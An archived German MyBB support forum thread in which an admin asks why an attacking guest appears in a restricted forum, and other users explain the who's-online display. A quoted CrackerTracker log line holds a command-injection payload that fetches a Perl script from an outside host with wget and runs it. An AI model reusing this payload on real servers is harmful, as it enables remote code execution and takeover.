Gast/Angreifer schwirrt in gesperrten Bereichen herum - Druckversion +- MyBB.de Forum (https://www.mybb.de/forum) +-- Forum: Archiv (https://www.mybb.de/forum/forum-57.html) +--- Forum: MyBB 1.2.x und älter (https://www.mybb.de/forum/forum-27.html) +---- Forum: Allgemeiner Support (https://www.mybb.de/forum/forum-36.html) +---- Thema: Gast/Angreifer schwirrt in gesperrten Bereichen herum (/thread-9635.html) Seiten: Seiten:
1
2
|
Gast/Angreifer schwirrt in gesperrten Bereichen herum - Anschi - 02.06.2008 Einen schönen Guten Abend ;o) Wir hatten heute bei uns die Begegnung der dritten Art.... Auf unserer Seite haben wir Bereiche, die für Gäste weder sichtbar, noch betretbar sind. Versucht ein Gast auf einen geblockten Bereich zu kommen, so steht dort "sieht sich eine Seite ohne benötigte Benutzerrechte an". Heute hatten wir einen Gast, bei dem da stand "sieht sich das Forum Mitgliedervorstellung an". Ein Forum, das er als Gast weder sehen, noch betreten kann. Ein Forum, das auch über die explizite Url nicht erreichbar ist. Wir haben alle Varianten geprüft, wie man als Gast erreichen kann, diese Meldung zu bekommen.... geschafft haben wir es nicht. Nun waren wir eben in den LogFiles vom CrackTracker.. und siehe da... da steht doch glatt: Code: "2008-06-02, 19:00:06, 1212426006, 62.xxx.xx.xxx, fid=5&sortby='];system('wget%20www.xxxpaw.pl/d.pl%20-o%20/tmp/d.pl;perl%20/tmp/d.pl');exit;//http://beuxxx.net/cmd.gif/cmd.gif?&cmd=wget%20www.xxxpaw.pl/d.pl%20-o%20/tmp/d.pl;perl%20/tmp/d.pl;id;, libwww-perl/5.76 Auf welche Art kommt dieser "Eindringling" in diesen Bereich??? Mal abgesehen davon, dass der CT ja allem Anschein nach brav seine Dienste geleistet hat... irgendwie erschließt sich mir das nicht, warum ich eben den Gast sehen konnte, wie er genau in diesem Forum hängt... Danke schon mal und liebe Grüße Anschi PS: An der Stelle hätt ich noch eine Frage... Warum steht bei einem Gast nur "liest ein Thema" und beim anderen Gast wird der Name des Themas angegeben??? *kopfkratz* RE: Gast/Angreifer schwirrt in gesperrten Bereichen herum - Murphy - 02.06.2008 Nabend. Welche Mybb-Version benutzt Du? Ist diese auf dem neusten Stand? Welche Plugins benutzt Du? Sind diese auf dem neusten Stand? Ich kann mir das ganze nur so erklären, dass jemand durch eine Injektion oder durch einen Bug Zutritt zum Board verschafft hat. RE: Gast/Angreifer schwirrt in gesperrten Bereichen herum - Anschi - 02.06.2008 Huch... sorry, hab gerade mein Profil korrigiert; Forensoftware ist natürlich auf dem neusten Stand (1.2.13). Plugins haben wir: Geburtstage auf Startseite Contact Form CrackerTracker eMail-Benachrichtigung bei Registrierung Google-Video-BBCode YouTube-Video-BBCode User, die heute online waren Sideboxes SpicefuceShoutbox ThreadViewer Trash Can Forum Usermap Usermap Tools Die sind alle, soweit überhaupt Neuerungen vorgenommen wurden, auf dem aktuellen Stand... Bis auf die Usermap (V 1.02). RE: Gast/Angreifer schwirrt in gesperrten Bereichen herum - Murphy - 02.06.2008 Also Fehler in Mybb sind nicht möglich. Wenn Fehler vorhanden sind, werden diese sofort via Update behoben (wie bei Version 1.2.13). Lücken können nur durch die Plugins entstehen. RE: Gast/Angreifer schwirrt in gesperrten Bereichen herum - Anschi - 02.06.2008 Das heißt auf gut Deutsch, dass eines der Plugins fehlerhaft ist?!?!?!? Nur müsste ich dann ja letztlich ALLE ausschalten, da sich mir nicht erschließt, durch welche Lücke er kam (bzw. ja eigentlich nicht, da ihm der CT ja letztlich wohl einen Tritt in den Hintern gab ;o) )... RE: Gast/Angreifer schwirrt in gesperrten Bereichen herum - Michael - 02.06.2008 Die vom Cracker Tracker abgefangene Anfrage zielt auf eine Sicherheitslücke im MyBB ab, die bereits mit Version 1.2.11 geschlossen wurde. Es wird versucht einen Befehl auf dem Server abzusetzen. Wenn du die aktuelle Version verwendest kann da nichts passieren. Anschi schrieb:PS: An der Stelle hätt ich noch eine Frage...Vermutlich wurde vom Besucher die showthread.php aufgerufen ohne eine Themen-ID zu übergeben. Daher kann der Anfrage kein Thema zugeordnet werden. Anschi schrieb:Einen schönen Guten Abend ;o)Zum eigentlichen Thema: Ist es sicher, dass der Benutzer überhaupt in diesem Bereich war? Beachte folgendes: Wenn du nicht die nötigen Berechtigungen besitzt, d.h. als Gast die Wer ist online-Liste anschaust, steht dort nur "Liest ein Thema". Bist du aber angemeldet und hast die Berechtigungen, wird der Betreff des Themas gezeigt. Das MyBB erkennt den Ort anhand der aufgerufenen URL. Dabei ist es egal, ob der Benutzer wirklich das Thema liest oder nur die Seite angezeigt bekommt, dass ihm die Berechtigungen fehlen. RE: Gast/Angreifer schwirrt in gesperrten Bereichen herum - Anschi - 02.06.2008 Puuuh... Danke Michael, irgendwie wäre es - wenn es auch immer und überall passieren kann - mein persönlicher Gau, wenn unser Board gehackt wird... Somit dürfen wir diesen Angriff also mit einem Lächeln betrachten ;o). Was das mit Gast und Thema betrifft, versteh ich das leider immer noch nicht so recht... 2 Beispiele: 1. In unserem Forum bin ich natürlich Admin. Dennoch sehe ich auch als Admin nicht zwingend, in welchem Thema sich ein User befindet. Beim einen steht der genaue Titel, beim anderen lediglich, dass er ein Thema liest. Gäste können bei uns gar nicht sehen, wer grad online ist ;o)))) .... 2. Auch hier in Deinem Board passiert es... ich gehe (eingeloggt) auf "Wer ist online" und lese beim einen Gast "liest ein Thema" und beim nächsten Gast ist der genaue Ort angegeben... Sobald bei uns ein Gast auf einen Bereich geht (z.B. Mitgliederliste), der für Gäste gesperrt ist (in dem Fall ist der Bereich aber immerhin durch einen Button für Gäste sichtbar), setzt MyBB es um und schreibt in der "Online-Liste", dass der Gast XY sich eine Seite ohne benötigte Benutzerrechte ansieht"... Natürlich kann ich nicht mit Sicherheit sagen, dass der "Angreifer" in diesem einen Forum war. Aber: Das Forum ist über den Gastbereich nicht mal sichtbar. Und selbst wenn er per Zufall einfach an die Url die fid angehängt hat, so wird es in meiner "wer ist online Liste" nicht umgesetzt. Hab eine Userin gebeten, das Forum aufzurufen, den Link zu kopieren, sich anschl. auszuloggen und als Gast die Url aufzurufen. Auch in dem Fall wurde nicht der Name des Forums bei ihr als Gast unter "wer ist online" umgesetzt... Bei ihr erschien, dass ihr die benötigten Rechte fehlen und bei mir stand "sieht sich eine Seite ohne benötigte Benutzerrechte an". Sorry... vermutlich schreib ich grad mega verwirrend, aber ich weiß grad nicht so recht, wie ich das in anständige Worte packen kann... RE: Gast/Angreifer schwirrt in gesperrten Bereichen herum - StefanT - 03.06.2008 Es kann sein, dass der Benutzer eine andere Fehlermeldung erhalten, hat oder, dass die keine-Berechtigung-Seite nicht gespeichert wurde. Er sollte trotzdem nichts gesehen haben. RE: Gast/Angreifer schwirrt in gesperrten Bereichen herum - United - 01.07.2008 Bei uns im Forum erscheint bei "Wer ist online", das der Gast sich an einem "unbekannten Ort" aufhält. Wenn man darauf anklickt erscheint eine leere Seite . Hat das was zu bedeuten? RE: Gast/Angreifer schwirrt in gesperrten Bereichen herum - Michael - 01.07.2008 Hallo, wohin führt der Link, wenn du auf "Unbekannter Ort" klickst? |